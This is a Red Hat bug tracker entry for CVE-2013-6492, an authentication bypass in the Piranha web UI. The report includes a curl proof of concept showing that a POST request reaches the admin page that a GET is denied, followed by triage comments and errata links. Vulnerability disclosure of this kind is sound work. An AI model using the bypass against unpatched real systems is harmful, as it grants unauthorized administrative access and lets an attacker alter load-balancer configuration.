Bug 1043040 (CVE-2013-6492)

Summary: CVE-2013-6492 piranha: web UI authentication bypass using POST requests
Product: [Other] Security Response Reporter: Othman Madjoudj <athmanem>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: andreas.schiermeier, cluster-maint, fdinitto, jkurik, rohara, vkrizan
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: Unspecified   
OS: Unspecified   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2014-02-13 19:50:31 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1061903, 1061904, 1061905, 1061906    
Bug Blocks: 1043709    
Attachments:
Description Flags
Auth bypass fix none

Description Othman Madjoudj 2013-12-13 19:58:51 UTC 
Created attachment 836487 [details]
Auth bypass fix

Description of problem:

In Piranha web UI configuration, only GET requests require authentication (via <Limit GET>...</Limit> in config file), it's possible to display some page by sending POST requests.

Version-Release number of selected component (if applicable):
piranha-0.8.6-4.el6.x86_64


Steps to Reproduce:

1. GET requests require authentication as expected:

# curl  -I http://192.168.1.34:3636/secure/control.php
HTTP/1.1 401 Authorization Required
Date: Fri, 13 Dec 2013 20:43:35 GMT
Server: Apache/2.2.15 (CentOS) PHP/5.3.3
WWW-Authenticate: Basic realm="access to the piranha web GUI"
Connection: close
Content-Type: text/html; charset=iso-8859-1

2. The same request but with POST:

# curl -d'' -I http://192.168.1.34:3636/secure/control.php 
<HTML>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML Strict Level 3//EN">

<HEAD>
<TITLE>Piranha (Control/Monitoring)</TITLE>
<STYLE TYPE="text/css">
[...]
[...]
[...]
</FORM>
</TD></TR></TABLE>
</BODY>


Actual results:
Admin page displayed

Expected results:
Admin page denied

Additional info:
A fix is attached
Comment 1 Vincent Danen 2013-12-17 00:25:28 UTC 
This would indeed be a security issue, so I'm going to turn this into an SRT bug and get a CVE assigned.  Thank you for this report.
Comment 2 Vincent Danen 2013-12-17 00:34:41 UTC 
This also looks to affect upstream piranha as the httpd.conf in question is included in the source file.
Comment 7 Tomas Hoger 2014-02-05 14:51:38 UTC 
Original report in the CentOS bug tracker:

http://bugs.centos.org/view.php?id=6825
Comment 8 Tomas Hoger 2014-02-05 15:44:37 UTC 
Bumping priority, this can be effectively used to modify lvs.cf configuration file.
Comment 12 errata-xmlrpc 2014-02-13 18:48:05 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0175 https://rhn.redhat.com/errata/RHSA-2014-0175.html
Comment 13 errata-xmlrpc 2014-02-13 18:48:20 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2014:0174 https://rhn.redhat.com/errata/RHSA-2014-0174.html